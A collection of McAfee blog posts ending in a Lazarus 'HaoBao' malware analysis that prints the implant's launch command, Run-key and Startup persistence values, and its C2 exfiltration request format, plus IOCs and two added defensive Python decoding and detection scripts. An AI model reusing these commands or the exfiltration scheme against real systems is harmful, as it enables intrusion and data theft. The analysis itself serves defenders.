The Dangers of Linking Your Apple ID to Financial Accounts (McAfee Blogs, Fri, 12 Oct 2018; https://securingtomorrow.mcafee.com/consumer/consumer-threat-notices/the-dangers-of-linking-your-apple-id-to-financial-accounts/)

The digital wallets of Chinese citizens are under attack thanks to a few bad apples. A recent string of cyberattacks in China utilized stolen Apple IDs to break into customers’ accounts and steal an undisclosed amount of money, according to a Bloomberg report. Almost immediately, Chinese e-transaction giants Tencent Holdings and Alipay warned their customers to monitor their accounts carefully, especially those who have linked their Apple IDs to Alipay accounts, WeChat Pay or their digital wallets and credit cards.

While Alipay works with Apple to figure out how this rare security breach happened and how hackers were able to hijack Apple IDs, they’re urging customers to lower their transaction limits to prevent any further losses while this investigation remains ongoing. Because Apple has yet to resolve this issue, any users who have linked their Apple IDs to payment methods including WeChat Pay — the popular digital wallet of WeChat which boasts over a billion users worldwide and can be used to pay for almost anything in China — remain vulnerable to theft. Apple also advises users to change their passwords immediately.

This security breach represents a large-scale example of a trend that continues to rise: the targeting of digital payment services by cybercriminals, who are capitalizing on the growing popularity of these services. Apple IDs represent an easy entry point of attack considering they connect Apple users to all the information, devices and products they care about. That interconnectivity of personal data is a veritable goldmine for cybercriminals if they get their hands on something like an Apple ID. With so much at stake for something as seemingly small as an Apple ID, it’s important for consumers to know how to safeguard their digital identifiers against potential financial theft. Here are some ways they can go about doing so:

  • Make a strong password. Your password is your first line of defense against attack, so you should make it as hard as possible for any potential cybercriminal to crack. Including a combination of uppercase and lowercase letters, numbers, and symbols will help you craft a stronger, more complex password that’s difficult for cybercriminals to guess. Avoid easy-to-guess passwords like “1234” or “password” at all costs.
  • Change login information for different accounts. An easy trap is using the same email and password across a wide variety of accounts, including Apple IDs. To better protect your Apple ID, especially if it’s linked to your financial accounts, it’s best to create a wholly original and complex password for it.
  • Enable two-factor authentication. While Apple works on identifying how these hackers hijacked Apple IDs, do yourself a favor and add an extra layer of security to your account by enabling two-factor authentication. By having to provide two or more pieces of information to verify your identity before you can log into your account, you place yourself in a better position to avoid attacks.
  • Monitor your financial accounts. When linking credentials like Apple IDs to your financial accounts, it’s important to regularly check your online bank statements and credit card accounts for any suspicious activity or transactions. Most banks and credit cards offer free credit monitoring as well. You could also invest in an identity protection service, which will reimburse you in the case of identity fraud or financial theft.

Stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, listening to our podcast Hackable?, and ‘Liking’ us on Facebook.

Financial Services and GDPR: What 200 Professionals Told Us About Their Data Protection (McAfee Blogs, Thu, 12 Apr 2018; https://securingtomorrow.mcafee.com/business/financial-services-gdpr-200-professionals-told-us-data-protection/)


When the European Union’s (EU) General Data Protection Regulation (GDPR) comes into full force May 25, European citizens will receive greater privacy protection and regulators will have a strengthened authority to take action against businesses that breach the new laws. Fines of up to 4% of annual global revenue or €20 million, whichever is greater, can be levied against any organization that processes personal data of EU residents, regardless of where it is based. Stories with doomsday predictions and generous helpings of fear can be found in many publications.

McAfee recently published an executive summary of our report, Beyond GDPR: Data Residency Insights from Around the World, that focuses on responses from the 200 professionals surveyed in the financial services sector. While there remains work to be done, it’s not all doom and gloom for the financial services industry. More than one quarter (27%) of financial services firms surveyed are already set up to comply with the GDPR requirement for controllers to report a breach to the appropriate authorities within 72 hours of becoming aware of it, compared to just 20% of other industries. This is most likely the result of greater preparation: the financial sector has a higher proportion of firms (28%) that have been working on compliance for three to four years, compared to the global average of just two years.

We believe that the looming threat of GDPR fines is an opportunity to communicate the seriousness of these regulations to your board and executives, and to position the firm as one that cares about personal privacy. And that could help boost the bottom line according to survey respondents – some 80% of financial services respondents believe that organizations that properly apply data protection laws will attract new customers.

Knowing what data is stored where is one of the most important steps of this data protection activity, but here are a few more that we recommend.

Step 1. Know Your Data.

Not only where it is, but what it is, why you are collecting it, and what levels of security and encryption are used to protect it. If you are collecting personal data that is not essential to your service offering, you may want to reconsider what you collect to better manage your risk of exposure, and comply with data-minimization principles.

Step 2. Enforce Encryption.

Effective encryption protects data by making it useless to hackers in the event of a data breach. Use proven encryption technologies, such as Triple Data Encryption Standard (3DES), RSA, or the Advanced Encryption Standard (AES), to ensure the safe storage of both your employees’ and your customers’ data.

Step 3. Pseudonymize personally identifiable information (PII).

Modifying data prior to processing so that it cannot be tracked back to a specific individual provides another layer of data protection. Pseudonymizing your data allows you to take advantage of Big Data and do larger scale data analysis, and is viewed as an appropriate technical and organizational measure under article 32 of the GDPR.

Step 4. Get Executive Management Involved.

The necessary changes to your data storage, monitoring, management, and security systems can require more human and financial resources than are currently budgeted. The potential for significant fines is an excellent opportunity to get the required support from the highest levels of your organization.

Step 5. Appoint a Project Owner.

Staying compliant with various data protection laws is not something that can be done by an IT staffer in their spare time. Consider appointing a data protection officer or equivalent, to take ownership of both implementation and ongoing management of this project. A data protection officer may be required in any event, depending on the nature of the processing carried out.

Step 6. Review Data Security with Cloud Vendors.

With cloud computing and storage touching most business processes in some fashion, consider conducting an audit of all your vendors’ systems, procedures, and contracts, and the data that they are handling and storing on your behalf. After all, each organization will be held responsible for meeting the GDPR requirements.

Step 7. Foster a Security-Aware Culture.

Human errors are often responsible for data and security breaches. It doesn’t matter that your business follows the strictest security protocol: one error made by one uninformed person could lead to irreparable damage. Consider making sure that all your employees and contractors receive proper and regular training on data security and the handling of customer information.

Step 8. Have a Response Plan.

No system is 100% bulletproof. You need an incident response plan in place to make sure that you can recover as quickly as possible in the event of a data breach. Under GDPR law, you are required as a controller to alert the appropriate authorities within 72 hours of becoming aware of a data breach, and you also need to notify any individuals whose personal data has been compromised.

Step 9. Go with a Privacy by Design Approach.

The GDPR places a requirement on organizations to take data privacy into account during the design stages of all projects. Companies will want to consider data-protection technologies such as data loss prevention (DLP) and cloud data protection through a cloud access security broker (CASB) from the very beginning of development. Implement data-protection policies that help prevent both accidental and malicious data theft by insiders and cybercriminals, wherever the data resides.

While no one can guarantee that you will not suffer a data loss, following these steps will help you understand where you stand, identify any gaps, and improve your organization’s responsiveness. Loss of customer confidence was the most common concern of financial services organizations (64%), and rapid containment and response is one of the best ways to protect your firm’s valuable reputation. So keep calm, and prepare for GDPR.

Read the full report, Beyond GDPR: Data Residency Insights from Around the World, and learn more about the top data-protection concerns and strategies of more than 800 senior business professionals from eight countries and a range of industries.

The information provided on this GDPR page is our informed interpretation of the EU General Data Protection Regulation, and is for information purposes only; it does not constitute legal advice or advice on how to achieve operational privacy and security. It is not incorporated into any contract and does not commit, promise, or create any legal obligation to deliver any code, result, material, or functionality. Furthermore, the information provided herein is subject to change without notice, and is provided “AS IS” without guarantee or warranty as to the accuracy or applicability of the information to any specific situation or circumstance. If you require legal advice on the requirements of the General Data Protection Regulation, or any other law, or advice on the extent to which McAfee technologies can assist you to achieve compliance with the Regulation or any other law, you are advised to consult a suitably qualified legal professional. If you require advice on the nature of the technical and organizational measures that are required to deliver operational privacy and security in your organization, you should consult a suitably qualified privacy professional. No liability is accepted to any party for any harms or losses suffered in reliance on the contents of this publication.

To See Mugshots of Today’s Bank Robbers, Look at a World Map (McAfee Blogs, Wed, 21 Feb 2018; https://securingtomorrow.mcafee.com/business/see-mugshots-todays-bank-robbers-look-world-map/)


In Depression-era America, bank robbers John Dillinger, Baby Face Nelson, and Pretty Boy Floyd were household names. Newspapers detailed their heists, radios narrated their getaways, and wanted posters plastered their mug-shot scowls from coast to coast. Every detail of their bank robberies and personal lives was seized upon, scrutinized, circulated, and discussed.

Eight decades later, bank robbery is a digital, systematic crime practiced – with methods constantly improved – by organized syndicates. The stubbled faces of Dillinger, Nelson, and Floyd have been replaced by shapes on the world map tracing the borders of Russia, North Korea, and Iran. A former NSA Deputy Director said publicly in March that “nation states are robbing banks.”

A 2015-16 campaign stole hundreds of millions of dollars from banks in the Society for Worldwide Interbank Financial Telecommunication (SWIFT) network. Security analysts believe that campaign, which targeted banks in developing countries, was linked to the North Korean Reconnaissance General Bureau (RGB). In 2017 North Korean hackers targeted at least three South Korean cryptocurrency exchanges, capitalizing on Bitcoin’s anonymity to circumvent international sanctions. The Pyongyang University of Science and Technology has begun offering its computer science students classes in Bitcoin and blockchain.

The best cybercriminals in the world live in Russia, where they are largely immune from prosecution. For instance, one of the cybercriminals who hacked Yahoo at the behest of Russian intelligence services, compromising millions of accounts, used the stolen data for spam and credit card fraud for personal benefit. Iran’s DDoS attack on leading U.S. banks exemplifies its coercive strategy to exert influence through disruption and destruction.

Hackers in these countries, whether affiliated with the state or not, account for much of the cost of global cybercrime. The latest strategy of their sophisticated operations is to target the “seams” between well-defended networks, exploiting weak points in the global financial network to pull off massive heists and in some cases further their national rhetoric.

To combat these operations, major international financial institutions are investing in defense, better fraud prevention, and transaction authentication. One report says that banks spend three times as much on cybersecurity as non-financial institutions to fight what has become a systemic risk to financial stability.

In the 1920s and ‘30s, the world sat back and watched John Dillinger, Baby Face Nelson, and Pretty Boy Floyd do their dirty work as the FBI slowly closed in. We can’t do that today. Governments, financial institutions, companies with banking records, and anyone with an ATM card should be invested in stopping financial cybercrime.

Banks have banded together to share information in near real time in order to protect the stability of the broader electronic financial system on which the world economy so heavily depends. Ultimately, they have determined that no one organization can go it alone when faced with such organized and well-funded adversaries. With the stability of the global financial system in play, unprecedented collaboration has become the new norm, and we at McAfee embrace the same spirit by building all of our technology to facilitate the sharing of critical data across hundreds of technology partners. Sharing and collaboration appear to be the only way to counter this new breed of adversary; no one can go it alone anymore. The banks are leading the way in this new reality of Together is Power.

Lazarus Resurfaces, Targets Global Banks and Bitcoin Users (McAfee Blogs, Mon, 12 Feb 2018; https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/lazarus-resurfaces-targets-global-banks-bitcoin-users/)
This blog was written with support and contributions provided by Asheer Malhotra, Jessica Saavedra Morales, and Thomas Roccia.

McAfee Advanced Threat Research (ATR) analysts have discovered an aggressive Bitcoin-stealing phishing campaign by the international cybercrime group Lazarus that uses sophisticated malware with long-term impact.

This new campaign, dubbed HaoBao, reprises Lazarus’s earlier phishing emails posing as employee recruitment, but now targets Bitcoin users and global financial organizations. When victims open the malicious documents attached to the emails, the malware scans for Bitcoin activity and then establishes an implant for long-term data gathering.

HaoBao’s targets and never-before-seen implants signal to McAfee ATR an ambitious campaign by Lazarus to establish cryptocurrency cybercrime at a sophisticated level.

Background

Beginning in 2017, the Lazarus group heavily targeted individuals with spear phishing emails impersonating job recruiters and containing malicious documents. The campaign lasted from April to October and used job descriptions relevant to target organizations, in both English and Korean. The objective was to gain access to the target’s environment and obtain key military program insight or steal money. The 2017 campaign’s targets ranged from defense contractors to financial institutions, including cryptocurrency exchanges; however, much of this fake job recruitment activity ceased months later, with the last activity observed October 22, 2017.

Analysis

On January 15, McAfee ATR discovered a malicious document masquerading as a job recruitment for a Business Development Executive located in Hong Kong at a large multinational bank. The document was distributed via a Dropbox account at the following URL:

hxxps://www.dropbox.com/s/qje0yrz03au66d0/JobDescription.doc?dl=1

This is the mark of a new campaign, though it utilizes techniques, tactics and procedures observed in 2017. The document had the last author ‘Windows User’ and was created January 16, 2018 with Korean language resources. Several additional malicious documents with the same author appeared between January 16 and January 24, 2018.

[Figure: Document summary from VirusTotal]

[Figure: Malicious job recruitment documents]

Victims are persuaded to enable content through a notification claiming the document was created in an earlier version of Microsoft Word. The malicious documents then launch an implant on the victim’s system via a Visual Basic macro.

[Figure: Malicious Microsoft Word document]


Implants dropped in campaign

The document (7e70793c1ca82006775a0cac2bd75cc9ada37d7c) created January 24, 2018 drops and executes an implant compiled January 22, 2018 with the name lsm.exe (535f212b320df049ae8b8ebe0a4f93e3bd25ed79). The implant lsm.exe contacted 210.122.7.129, which also resolves to worker.co.kr.

[Figure: Implants dropped in campaign]

The other malicious document (a79488b114f57bd3d8a7fa29e7647e2281ce21f6) created January 19, 2018 drops the implant (afb2595ce1ecf0fdb9631752e32f0e32be3d51bb), which is 99% similar to the lsm.exe implant.

This document was distributed from the following Dropbox URLs:

  • hxxps://dl.dropboxusercontent.com/content_link/AKqqkZsJRuxz5VkEgcguqNE7Th3iscMsSYvivwzAYuTZQWDBLsbUb7yBdbW2lHos/file?dl=1
  • hxxps://www.dropbox.com/s/q7w33sbdil0i1w5/job description.doc?dl=1

[Figure: HTTP response for job description document]

This implant (csrss.exe), compiled January 15, 2018, contacts the IP address 70.42.52.80, which resolves to deltaemis.com. We identified that this domain was used to host a malicious document from a previous 2017 campaign targeting the Sikorsky program:

  • hxxp://deltaemis.com/CRCForm/3E_Company/Sikorsky/E4174/JobDescription.doc

A third malicious document (dc06b737ce6ada23b4d179d81dc7d910a7dbfdde) created January 19, 2018 drops e8faa68daf62fbe2e10b3bac775cce5a3bb2999e, which was compiled January 15, 2018. This implant communicates with a South Korean IP address, 221.164.168.185, which resolves to palgong-cc.co.kr.

McAfee ATR analysis finds the dropped implants have never been seen before in the wild and have not been used in previous Lazarus campaigns from 2017. Furthermore, this campaign deploys a one-time data gathering implant that relies upon downloading a second stage to gain persistence. The implants contain a hardcoded word “haobao” that is used as a switch when executing from the Visual Basic macro.

Malicious Document Analysis

The malicious document contains two payloads embedded as encrypted string arrays in the Visual Basic macro code. They are decrypted in memory, written to disk and launched in sequence (the second stage malicious binary first, then the decoy document).

The VBA Macro code is self-executing and configured to execute when the OLE document (MS Word doc) is opened (via “Sub AutoOpen()”). The AutoOpen() function in the VBA Macro performs the following tasks in the sequence listed:

  • Decodes the target file path of the second stage binary payload. This file path is derived from the current user’s Temp folder location:

<temp_dir_path>\.\lsm.exe

[Figure: VB code to decrypt second stage filepath]

  • Decodes the second stage binary in memory and writes it to the %temp%\.\lsm.exe file location.

[Figure: second stage binary (MZ) as an encrypted String Array in the VBA Macro]

[Figure: second stage binary (MZ) decoded in memory by the VBA Macro]

  • After writing the second stage payload to disk, the VBA code performs two important actions:
    • Runs the second stage payload using cmd.exe with “start /b”, so that the cmd.exe process exits as soon as the payload is launched. This way a process enumeration tool cannot find the parent process, giving the implant a smaller footprint.

cmdline for executing the second stage binary:

cmd.exe /c start /b <temp_dir_path>\.\lsm.exe /haobao

    • Adds persistence on the system by creating a shortcut in the user’s Startup folder with the correct cmdline arguments:

Link file command line: <temp_dir_path>\.\lsm.exe /haobao

Link File Name: GoogleUpdate.lnk

[Figure: Trigger code for executing the second stage binary and establishing persistence]

[Figure: LNK file configuration for establishing persistence]

  • Once the second stage payload has been launched, the VBA macro proceeds to display a decoy document to the end user. This decoy document is also stored in the VBA macro as an encrypted string array (similar to the second stage payload). The decoy document is likewise written to the user’s temp directory, at the following path:

<temp_dir_path>\.\Job Description.doc

[Figure: Decoy Document decoded in memory by the VBA Macro]

  • Once the decoy document has been written to disk, the VBA macro sets its file attributes to System + Hidden.
  • The decoy document is then opened by the malicious VBA macro, and the original malicious document’s caption is copied over to the decoy document to trick the end user into mistaking the decoy for the original (malicious) document.
  • This activity, combined with the fact that the VBA macro then closes the current (malicious) document, indicates that the macro aims to trick an unsuspecting user into thinking that the decoy document currently open is the original document they opened.
  • Since the decoy document is a benign file and does not contain any macros, the victim does not suspect any malicious behavior.

Implant Analysis

As part of its initialization activities, the implant does the following:

  • Checks the string passed to it on the command line:
    • “/haobao” in the case of 535f212b320df049ae8b8ebe0a4f93e3bd25ed79
    • “/pumpingcore” in the case of e8faa68daf62fbe2e10b3bac775cce5a3bb2999e

If the malware does not find this string in its cmdline arguments, it simply quits without going any further.

  • Unwraps a DLL into memory and calls its one and only export using reflective DLL loading.

During our research, we discovered additional variants of the DLL file.

[Figure: DLL information]


  • As part of reflective DLL loading, the malware performs the following tasks on the DLL it has unwrapped in memory:
    • Copies the unwrapped DLL into new locations in its own memory space.
    • Builds the imports required by the DLL (based on the DLL’s IAT).

[Figure: Imports builder code in malware for the DLL imports]

    • Calls the newly loaded DLL image’s entry point (DllMain) with DLL_PROCESS_ATTACH to complete the loading of the DLL in the malware process.

[Figure: DLL Entry Point Call from malware to finish loading of the DLL in memory]

    • Calls the actual malicious export in the DLL, named “CoreDn”.

[Figure: Hardcoded DLL export name “CoreDn” in malware]

All the malicious activities described below are performed by the DLL unless specified otherwise.

Data Reconnaissance

The implant has the capability of gathering data from the victim’s system. The following information is gathered and sent to the command and control server:

  • Computer name and currently logged-on user’s name, stored in the format:

<ComputerName> \ <Username>

[Figure: Malware obtaining the computer name and user name]

  • List of all processes currently running on the system, one process per line, in the format:

<Process Name>\r\n
<Process Name>\r\n
...

[Figure: Malware collecting process information from endpoint]

  • The presence of a specific registry key on the system:

HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt

  • The malware appends an indicator (flag) specifying whether the above registry key was found in the user’s registry. This key is checked again as part of the command and control communication, and its presence is also sent as a duplicate value to the command and control server in the HTTP POST request (explained below).

[Figure: Malware checking for the presence of the registry key]

Exfiltration

Preparation

In preparation for exfiltrating the information collected from the endpoint, the malware performs the following activities:

  • Encodes the collected information with a simple single-byte XOR operation using the key 0x34.
  • Base64-encodes (standard alphabet) the XORed data.
  • Again checks for the presence of the registry key HKCU\Software\Bitcoin\Bitcoin-Qt.


Command and Control Server Communication

Once the malware has performed all these activities it sends an HTTP POST request to the CnC server:

  • www[dot]worker.co.kr for md5 BDAEDB14723C6C8A4688CC8FC1CFE668
  • www[dot]palgong-cc.co.kr for md5 D4C93B85FFE88DDD552860B148831026

In the format:

HTTP POST to www[dot]worker.co.kr

/board2004/Upload/files/main.asp?idx=%d&no=%s&mode=%s

OR

HTTP POST to www[dot]palgong-cc.co.kr

/html/course/course05.asp?idx=%d&no=%s&mode=%s

where

idx = 20 (14h) if the registry key does not exist; 24 (18h) if the key exists.

no = XORed + base64-encoded “<Computername> \ <username>”

mode = XORed + base64-encoded process listing + registry key flag

[Figure: Command and control server domain]
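As an added example, not code from the McAfee write-up, the following Python script implements the encoding described above (single-byte XOR with 0x34, then standard base64) and parses a beacon request-target in the documented format so an analyst can recover the host\user string, the process listing and the registry flag from a captured POST. The sample request, the hostname, the user name and the trailing flag value “1” are constructed assumptions; the write-up does not give the flag’s exact encoding.

```python
import base64
from urllib.parse import unquote

XOR_KEY = 0x34  # single-byte XOR key reported in the analysis

# idx= values reported in the analysis: 20 (0x14) when the Bitcoin-Qt
# registry key is absent, 24 (0x18) when it is present.
IDX_KEY_ABSENT = 20
IDX_KEY_PRESENT = 24

# Request paths documented for the two command and control servers.
C2_PATHS = {
    "/board2004/Upload/files/main.asp": "www.worker.co.kr",
    "/html/course/course05.asp": "www.palgong-cc.co.kr",
}


def encode_field(plaintext: str) -> str:
    """Implant-side encoding: XOR every byte with 0x34, then standard base64."""
    xored = bytes(b ^ XOR_KEY for b in plaintext.encode("utf-8"))
    return base64.b64encode(xored).decode("ascii")


def decode_field(encoded: str) -> str:
    """Analyst-side decoding. A single-byte XOR is its own inverse, so the
    same key undoes the encoding once the base64 layer is stripped."""
    raw = base64.b64decode(encoded, validate=True)
    return bytes(b ^ XOR_KEY for b in raw).decode("utf-8", errors="replace")


def parse_beacon(request_target: str) -> dict:
    """Parse the path and query of a HaoBao POST and decode its fields.

    The query is split by hand rather than with parse_qs because the base64
    values contain '+' and '=' characters that parse_qs would mangle.
    Raises ValueError when the path or idx value does not match the
    documented format, so unrelated traffic is not misreported."""
    path, sep, query = request_target.partition("?")
    if path not in C2_PATHS or not sep:
        raise ValueError("not a documented HaoBao beacon path: %r" % path)

    fields = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        fields[key] = unquote(value)

    idx = int(fields.get("idx", "-1"))
    if idx not in (IDX_KEY_ABSENT, IDX_KEY_PRESENT):
        raise ValueError("unexpected idx value %d" % idx)

    # mode= carries one "<Process Name>\r\n" per process followed by the
    # registry flag. ASSUMPTION: the flag is whatever trails the last CRLF;
    # the write-up does not specify its exact encoding.
    mode_text = decode_field(fields.get("mode", ""))
    lines = mode_text.split("\r\n")
    return {
        "c2_host": C2_PATHS[path],
        "wallet_key_present": idx == IDX_KEY_PRESENT,
        "host_user": decode_field(fields.get("no", "")),
        "processes": lines[:-1],
        "registry_flag": lines[-1],
    }


# Constructed sample beacon (not captured traffic): a lab host with a
# Bitcoin-Qt process running and the registry key present (idx=24).
SAMPLE_PROCESSES = "System\r\nsmss.exe\r\ncsrss.exe\r\nbitcoin-qt.exe\r\n"
SAMPLE_REQUEST = (
    "/board2004/Upload/files/main.asp?idx=24"
    + "&no=" + encode_field("WIN-LAB01 \\ analyst")
    + "&mode=" + encode_field(SAMPLE_PROCESSES + "1")
)


if __name__ == "__main__":
    beacon = parse_beacon(SAMPLE_REQUEST)
    print("C2 host        :", beacon["c2_host"])
    print("Bitcoin-Qt key :", beacon["wallet_key_present"])
    print("Host \\ user    :", beacon["host_user"])
    print("Processes      :", ", ".join(beacon["processes"]))
    print("Registry flag  :", beacon["registry_flag"])
```

Pointing parse_beacon at the request-target column of a proxy log is enough to pull out which hosts reported a Bitcoin-Qt wallet (idx=24) and what they were running at the time.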

Persistence

The persistence mechanism of the malware is performed only for the downloaded implant. Persistence for the implant itself is established via the Visual Basic macro code initially executed when the victim opens the document. The malware-side persistence is performed ONLY if the malware successfully executes the downloaded implant. The malware first tries to update the HKEY_LOCAL_MACHINE registry key.

If that update is unsuccessful, it then tries to update the HKEY_CURRENT_USER registry key. Value written to the registry to achieve persistence on the endpoint:

Registry Subkey = Software\Microsoft\Windows\CurrentVersion\Run

Value Name = AdobeFlash

Value Content = “C:\DOCUME~1\<username>\LOCALS~1\Temp\OneDrive.exe” kLZXlyJelgqUpKzP

[Figure: Registry based persistence of the second stage payload]
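As an added example that is not the write-up’s own code, the following Python turns the host-level artefacts described in the macro analysis and in this persistence section into three detection rules and runs them over a constructed, Sysmon-style event list: the second stage launched from the user’s Temp folder under cmd.exe “start /b” with the /haobao or /pumpingcore switch, GoogleUpdate.lnk dropped into the Startup folder, and the AdobeFlash Run-key value pointing at OneDrive.exe in Temp. The event field names, the user “victim” and the paths are assumptions modelled on Sysmon event IDs 1, 11 and 13.

```python
import re
from typing import Dict, List, Optional, Tuple

# Command-line switches the implants require before doing anything (from the write-up).
IMPLANT_SWITCHES = ("/haobao", "/pumpingcore")

# Windows paths are case-insensitive, so every pattern is compiled that way.
TEMP_DIR_RE = re.compile(r"\\(?:Temp|LOCALS~1\\Temp)\\", re.IGNORECASE)
STARTUP_LNK_RE = re.compile(r"\\Startup\\GoogleUpdate\.lnk$", re.IGNORECASE)
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run\\AdobeFlash$", re.IGNORECASE)


def _has_switch(cmdline: str) -> bool:
    """True if any whitespace-separated token is one of the implant switches."""
    return any(tok in IMPLANT_SWITCHES for tok in cmdline.lower().split())


def check_event(event: Dict) -> Optional[str]:
    """Return a rule name if one Sysmon-style event matches, else None."""
    eid = event.get("EventID")
    if eid == 1:  # process creation
        cmd = event.get("CommandLine", "")
        parent = event.get("ParentCommandLine", "")
        image = event.get("Image", "")
        # Stage two lives in %temp%, carries the switch, and its cmd.exe parent
        # used "start /b" so that the parent exits immediately.
        if (_has_switch(cmd) and TEMP_DIR_RE.search(image)
                and "start /b" in parent.lower()):
            return "haobao_stage2_launch"
    elif eid == 11:  # file creation
        if STARTUP_LNK_RE.search(event.get("TargetFilename", "")):
            return "haobao_startup_lnk"
    elif eid == 13:  # registry value set
        details = event.get("Details", "")
        if (RUN_KEY_RE.search(event.get("TargetObject", ""))
                and "onedrive.exe" in details.lower()
                and TEMP_DIR_RE.search(details)):
            return "haobao_run_key"
    return None


def scan_events(events: List[Dict]) -> List[Tuple[str, str]]:
    """Run every rule over every event; return (rule, process image) pairs."""
    hits = []
    for ev in events:
        rule = check_event(ev)
        if rule:
            hits.append((rule, ev.get("Image", "")))
    return hits


# Constructed sample telemetry (not real logs), modelled on the behaviour
# described in the post. User name and host paths are made up.
TEMP = r"C:\Users\victim\AppData\Local\Temp"
WINWORD = r"C:\Program Files\Microsoft Office\WINWORD.EXE"
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c start /b " + TEMP + r"\.\lsm.exe /haobao",
     "ParentCommandLine": '"' + WINWORD + '"'},
    {"EventID": 1, "Image": TEMP + r"\.\lsm.exe",
     "CommandLine": TEMP + r"\.\lsm.exe /haobao",
     "ParentCommandLine": r"cmd.exe /c start /b " + TEMP + r"\.\lsm.exe /haobao"},
    {"EventID": 11, "Image": WINWORD,
     "TargetFilename": r"C:\Users\victim\AppData\Roaming\Microsoft\Windows"
                       r"\Start Menu\Programs\Startup\GoogleUpdate.lnk"},
    {"EventID": 13, "Image": TEMP + r"\.\lsm.exe",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows"
                     r"\CurrentVersion\Run\AdobeFlash",
     "Details": r'"C:\DOCUME~1\victim\LOCALS~1\Temp\OneDrive.exe" kLZXlyJelgqUpKzP'},
    # Benign noise: a normal Word launch and the legitimate OneDrive Run value.
    {"EventID": 1, "Image": WINWORD, "CommandLine": "WINWORD.EXE /n",
     "ParentCommandLine": "explorer.exe"},
    {"EventID": 13, "Image": r"C:\Windows\explorer.exe",
     "TargetObject": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OneDrive",
     "Details": r"C:\Users\victim\AppData\Local\Microsoft\OneDrive\OneDrive.exe"},
]

if __name__ == "__main__":
    for rule, image in scan_events(SAMPLE_EVENTS):
        print(rule, "<-", image)
```

The cmd.exe event itself is deliberately not flagged; the rule keys on the child in Temp, which is still present after its short-lived parent has exited.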

Connections to 2017 campaigns

The techniques, tactics and procedures are very similar to the campaigns that targeted US defense contractors, the US energy sector, financial organizations and cryptocurrency exchanges in 2017.

The same ‘Windows User’ author appeared back in 2017 in two malicious documents, 비트코인_지갑주소_및_거래번호.doc and 비트코인 거래내역.xls, which were involved in cryptocurrency targeting. Furthermore, one of the implants communicates with an IP address that was involved in hosting malicious job description documents in 2017 involving the Sikorsky military program.

McAfee Advanced Threat Research determines with confidence that Lazarus is the threat group behind this attack for the following reasons:

  • The implant contacts an IP address / domain that was used to host a malicious document from a previous Lazarus campaign in 2017
  • The same author that appeared in the Lazarus 2017 campaigns appears in these recent malicious documents
  • The campaign uses the same malicious document structure and similar job recruitment ads as those observed in past Lazarus campaigns
  • The techniques, tactics and procedures align with the Lazarus group’s interest in cryptocurrency theft

Conclusion

In this latest discovery by McAfee ATR, despite a short pause in similar operations, the Lazarus group targets crypto currency and financial organizations. Furthermore, we have observed an increased usage of limited data gathering modules to quickly identify targets for further attacks. This campaign is tailored to identifying those who are running Bitcoin related software through specific system scans.


Indicators of Compromise

MITRE ATT&CK techniques

  • Data encoding
  • Data encrypted
  • Command-Line Interface
  • Account discovery
  • Process Discovery
  • Query registry
  • Hidden files and directories
  • Custom cryptographic protocol
  • Registry Run Keys / Start Folder
  • Startup Items
  • Commonly used port
  • Exfiltration Over Command and Control Channel

IPs

  • 210.122.7.129
  • 70.42.52.80
  • 221.164.168.185

URLs

  • hxxps://dl.dropboxusercontent.com/content_link/AKqkZsJRuxz5VkEgcguqNE7Th3iscMsSYvivwzAYuTZQWDBLsbUb7yBdbW2lHos/file?dl=1
  • hxxps://www.dropbox.com/s/q7w33sbdil0i1w5/job description.doc?dl=1

Hashes

  • dc06b737ce6ada23b4d179d81dc7d910a7dbfdde
  • a79488b114f57bd3d8a7fa29e7647e2281ce21f6
  • 7e70793c1ca82006775a0cac2bd75cc9ada37d7c
  • 535f212b320df049ae8b8ebe0a4f93e3bd25ed79
  • 1dd8eba55b16b90f7e8055edca6f4957efb3e1cd
  • afb2595ce1ecf0fdb9631752e32f0e32be3d51bb
  • e8faa68daf62fbe2e10b3bac775cce5a3bb2999e

McAfee Detection

  • BackDoor-FDRO!
  • Trojan-FPCQ!
  • RDN/Generic Downloader.x
  • RDN/Generic Dropper
  • RDN/Generic.dx

The post Lazarus Resurfaces, Targets Global Banks and Bitcoin Users appeared first on McAfee Blogs.

Ukrainian Financial Institutions Targeted by Wave of Malicious EPS File Attacks
https://securingtomorrow.mcafee.com/business/ukrainian-financial-institutions-targeted-wave-malicious-eps-file-attacks/ Thu, 24 Aug 2017 23:05:00 +0000

Last week, the Ukrainian Central Bank issued a warning around an attack being launched against Ukrainian banks. Thanks to one of our contacts in the region, we received the malware at an early stage and were able to provide coverage for our customers—always our first priority. Now that local authorities have publicly disclosed the matter, we would like to share some insights into the campaign.

The attacks appear to have targeted banks in Russia as well as Ukraine, and we are aware of reports of similar attack vectors and payloads in other countries.

The initial threat started with emails sent to the banks around August 10, 2017, with a second wave on August 18 that carried attachments containing a payload. The email subject lines were crafted to get the users’ attention and lure them into opening the attachments.

Who wouldn’t open an email with the subject “Unauthorized Money Withdrawal”, even from an email address unrelated to any bank? We noticed the following attachment names for the document files:

  • Выписка.docx
  • Выписка по счету.docx
  • Выписка по карте.docx
  • Выписка по карте клиента.docx
  • 12.docx

The above can be translated as “Account Statement” or “Card Statement/Customer Card Statement”.

The document is weaponized with a payload hidden in an embedded Encapsulated Postscript (EPS) file. EPS files are mostly used to display print previews or contain other functions related to printing.

When the .docx file is opened, Microsoft Word again shows the name of the document, ‘Customer Card Statement’.

When Word is opened, the payload in the .eps file hooks and injects itself and creates the process “FLTLDR.exe”, which runs the EPS import filter from the path: %PROGRAMFILES%\Microsoft Shared\GRPHFLT\EPSIMP32.FLT

Since .docx files are zip archives, we unzipped the attachment, examined the extracted files for interesting artifacts and compared them against our internal threat database. For example, we discovered a URL in the App.xml file.

When we investigated that URL through our resources, we discovered that the same URL had been used in a targeted campaign described by our industry peers at ESET.

Actually, the targeted attack described by ESET has a lot more in common with our current banking campaign. Could our attackers have borrowed the code and altered it to their needs?

When we dug deeper into the details of the ‘image1.eps’ file, we noticed two awkward strings that you normally wouldn’t see in malware:

  • %%Icantdestroywhatisntthere
  • %%Myheartisjusttoodarktocare

